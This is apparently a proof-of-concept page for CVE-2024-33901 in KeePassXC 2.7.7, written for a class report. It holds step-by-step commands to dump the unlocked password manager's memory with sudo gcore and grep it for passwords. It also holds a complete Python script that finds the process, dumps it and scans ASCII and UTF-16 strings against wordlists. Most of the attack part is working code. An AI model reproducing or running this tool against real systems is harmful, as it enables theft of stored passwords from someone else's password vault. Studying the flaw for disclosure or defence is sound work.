POC details: cf999209d27a1a7ae0016b8c54e3fdfd6033d51c

Source
Related vulnerability
Title: KeePass security vulnerability (CVE-2024-33901)
Description: KeePass is an open-source password manager. KeePassXC (a KeePass-derived open-source password manager) version 2.7.7 has a security vulnerability: an attacker who can obtain a memory dump of the unlocked process can recover some of the passwords stored in the .kdbx database.
Description
Short program that demonstrates the vulnerability CVE-2024-33901 in KeePassXC version 2.7.7
Introduction
# CVE-2024-33901-ProofOfConcept
Short program that demonstrates the vulnerability CVE-2024-33901 in KeePassXC version 2.7.7

The report for the class might need the source code linked, so that's why I created the repo for this

## How to replicate the vulnerability
1. Open KeePassXC and unlock the database.
2. While the database is unlocked, create a memory dump of the KeePassXC process.

   First find its PID:

       ps aux | grep keepassxc

   Then dump the process with `gcore` (shipped with GDB). Attaching to another process via ptrace normally requires root, or the same user under a permissive `kernel.yama.ptrace_scope`, which is why the command runs under `sudo`:

       sudo gcore -o keepassxc_dump PID_HERE

   For example, if the PID you got was 1234, the command would be:

       sudo gcore -o keepassxc_dump 1234

   `gcore` writes the dump to `keepassxc_dump.1234`, i.e. the `-o` prefix followed by the PID.
3. Finally, extract the printable strings from the dump and grep them for a password guess:

       strings keepassxc_dump.PID_HERE | grep "password guess here"

   So if the PID was 1234, the command would be:

       strings keepassxc_dump.1234 | grep "password guess here"

   Note that `strings` only reports runs of 7-bit ASCII by default; `strings -e l` additionally reports 16-bit little-endian (UTF-16) text, which is how Qt's `QString` (used by KeePassXC) holds text in memory.

Once the dump file exists, the search can be run offline at any later time: locking the database again or closing KeePassXC afterwards does not help, because the secrets are already in the dump.

The Python script in this repo (`keepassxc_exploit.py`) automates these steps and tries every guess from the bundled wordlists (`CommonPasswords.txt` and `TestPasswords.txt`).
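The following is an added example that reimplements the procedure above end to end; it is not the repository's own `keepassxc_exploit.py`. It assumes `pgrep` and `gcore` are on the PATH and that `gcore` names its output `<prefix>.<pid>`, as shown in the README. It goes slightly beyond the README's `strings | grep` by also scanning for UTF-16LE runs (the equivalent of `strings -e l`), since Qt's `QString` stores text as UTF-16 in memory. `SAMPLE_DUMP` is a constructed stand-in for a core file so the scanner can be run offline without dumping a real process.

```python
#!/usr/bin/env python3
"""Added example (not the repo's keepassxc_exploit.py): dump the unlocked
KeePassXC process with gcore and search the dump for wordlist passwords."""
import re
import subprocess
import sys
from pathlib import Path

# Same semantics as `strings`: runs of at least 4 printable ASCII bytes ...
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
# ... and, like `strings -e l`, runs of 16-bit little-endian characters,
# because KeePassXC is Qt-based and QString keeps text as UTF-16 in memory.
UTF16LE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def extract_strings(data: bytes):
    """Yield (encoding, text) for every printable run found in the dump."""
    for m in ASCII_RUN.finditer(data):
        yield "ascii", m.group().decode("ascii")
    for m in UTF16LE_RUN.finditer(data):
        yield "utf-16le", m.group().decode("utf-16-le")


def find_candidates(data: bytes, guesses):
    """Map each guess that occurs inside some printable run to the runs containing it.

    Substring matching mirrors the README's `strings | grep "<guess>"` step."""
    runs = list(extract_strings(data))
    hits = {}
    for guess in guesses:
        if not guess:
            continue
        found = [(enc, text) for enc, text in runs if guess in text]
        if found:
            hits[guess] = found
    return hits


def load_wordlist(path):
    """One guess per line; blank lines are skipped, other whitespace is kept."""
    lines = Path(path).read_text(encoding="utf-8", errors="replace").splitlines()
    return [ln for ln in lines if ln.strip()]


def find_keepassxc_pid():
    """PID of the running keepassxc process (assumes `pgrep` is available)."""
    res = subprocess.run(["pgrep", "-x", "keepassxc"], capture_output=True, text=True)
    pids = res.stdout.split()
    if not pids:
        raise RuntimeError("no running keepassxc process found")
    return int(pids[0])


def dump_process(pid, prefix="keepassxc_dump"):
    """Attach with gcore (GDB) and write <prefix>.<pid>, exactly as in the README.

    ptrace-attaching to another process needs root (or a permissive
    kernel.yama.ptrace_scope), hence sudo."""
    subprocess.run(["sudo", "gcore", "-o", prefix, str(pid)], check=True)
    return Path(f"{prefix}.{pid}")


# Constructed stand-in for a core dump so the scanner can be exercised offline.
SAMPLE_DUMP = (
    b"\x7fELF" + b"\x00" * 12                       # fake header bytes, not a real core file
    + b"QString" + b"\x00" * 4                      # an unrelated ASCII string
    + b"Master pa55word!" + b"\x00" * 8             # 8-bit text: what plain `strings` finds
    + "hunter2".encode("utf-16-le") + b"\x00\x00"   # UTF-16LE text: what `strings -e l` finds
    + bytes(range(256))                             # binary noise
)
SAMPLE_GUESSES = ["hunter2", "Master pa55word!", "letmein"]   # constructed wordlist


def scan_dump(dump_path, wordlist_path):
    """Run the offline step of the attack against a dump already on disk."""
    return find_candidates(Path(dump_path).read_bytes(), load_wordlist(wordlist_path))


def main(argv):
    if len(argv) == 3:        # <dump> <wordlist>: scan an existing dump
        hits = scan_dump(argv[1], argv[2])
    elif len(argv) == 2:      # <wordlist>: dump the live process, then scan it
        hits = scan_dump(dump_process(find_keepassxc_pid()), argv[1])
    else:                     # no arguments: demonstrate on the constructed sample
        hits = find_candidates(SAMPLE_DUMP, SAMPLE_GUESSES)
    for guess, found in hits.items():
        for enc, text in found:
            print(f"[+] {guess!r} found ({enc}) in run {text!r}")
    return 0 if hits else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with no arguments to see both sample secrets recovered (the ASCII one and the UTF-16LE one that plain `strings` would miss), with `keepassxc_dump.1234 CommonPasswords.txt` to scan a dump taken earlier, or with just a wordlist to perform the live dump-and-scan. The dump file itself contains the recovered secrets in cleartext, so delete it when finished.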
File snapshot

    [4.0K] /data/pocs/cf999209d27a1a7ae0016b8c54e3fdfd6033d51c
    ├── [ 81K] CommonPasswords.txt
    ├── [6.4K] keepassxc_exploit.py
    ├── [1.2K] README.md
    └── [  34] TestPasswords.txt

    0 directories, 4 files